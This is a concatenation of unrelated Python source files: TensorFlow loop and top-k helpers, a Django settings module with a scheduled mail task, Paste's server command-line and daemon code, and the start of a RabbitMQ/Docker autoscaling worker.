tf.While(input_=state.Flatten(), cond=LoopCond, body=LoopBody)).loop_state
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: The variable's TF `Operation`. It could be one of VarHandleOp,
Variable and VariableV2.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type == 'VarHandleOp':
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
assert var_op.type in ['Variable', 'VariableV2']
return var_op.outputs[0]
|
settings_20210906114827.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:50").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(60)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
serve.py
|
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out uneeded functionality.
# All top level imports from each package moved here and organized
from __future__ import absolute_import
from __future__ import print_function
import atexit
import errno
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from six.moves import configparser
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault(object):
pass
# run and invoke methods moved below ServeCommand
class Command(object):
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%%prog [options]%s\n%s" % (
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = list()
commands.sort()
if not commands:
print('No commands registered.')
print('Have you installed Paste Script?')
print('(try running python setup.py develop)')
return 2
print('Known commands:')
longest = max([len(n) for n, c in commands])
for name, command in commands:
print(' %s %s' % (self.pad(name, length=longest),
command.load().summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False) and
getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
import socket
raise socket.error(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print('Writing PID %s to %s' % (pid, pid_file))
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except (OSError, IOError) as e:
print("Could not delete: %s" % e)
return 2
return 1
for j in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print('PID %s in %s is not running' % (pid, pid_file))
return 1
print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except (OSError, IOError):
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
import pwd
import grp
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
import grp
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, IOError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
print('Stale PID left in file: %s (%e)' % (filename, e))
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
import socket
import errno
for bound_address in bound_addresses:
for attempt in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except socket.error as e:
if e.args[0] != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_') and
sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e)
exit_code = e.exit_code
sys.exit(exit_code)
|
admin_worker.py
|
#!/usr/bin/env python
# -*- enconding: utf-8 -*-
from docker_client import DockerAPIClient
from pika import BlockingConnection, URLParameters
from pika.exceptions import AMQPConnectionError
from time import sleep
from threading import Thread
from functools import partial
from os import environ
from os.path import join, dirname
from dotenv import load_dotenv
from datetime import datetime, timedelta
from rabbimq_client import RabbitMQClient
from json import loads
from copy import copy
from ast import literal_eval
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
class BColors:
GREY = '\u001b[37;1m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = "\u001b[0m"
class AdminWorker(object):
def __init__(self, reconection_time=10, prefetch_count=1, debug=True):
self._amqp_url = environ['AMQP_URL']
self._task_queue = environ['TASK_QUEUE']
self._keep_alive_queue = environ['KEEP_ALIVE_QUEUE']
self._reconection_time = int(environ['AMQP_TIMEOUT']) # 10 seconds
self._last_timestamps = dict()
self._lights = { # Is COLOR if less than assigned percentage
'GREY': float(environ['GREY_LIGHT']), # Means IDLE
'GREEN': float(environ['GREEN_LIGHT']),
'YELLOW': float(environ['YELLOW_LIGHT']),
'RED': float(environ['RED_LIGHT'])
}
self._prefetch_count = prefetch_count
self._qty_task = int(environ['QTY_TASK'])
self._max_scale = int(environ['MAX_SCALE'])
self._min_scale = int(environ['MIN_SCALE'])
self._service_monitor = environ['SERVICE_MONITOR']
self._service_dealer = environ['SERVICE_DEALER']
self._step_batch_dealer = int(environ['STEP_BATCH_DEALER'])
self._min_batch_dealer = int(environ['MIN_BATCH_DEALER'])
self._max_batch_dealer = int(environ['MAX_BATCH_DEALER'])
self._debug = debug
self._refresh_rate = float(environ['REFRESH_RATE'])
self._max_timeout = timedelta(seconds=int(environ['MAX_TIMEOUT']))
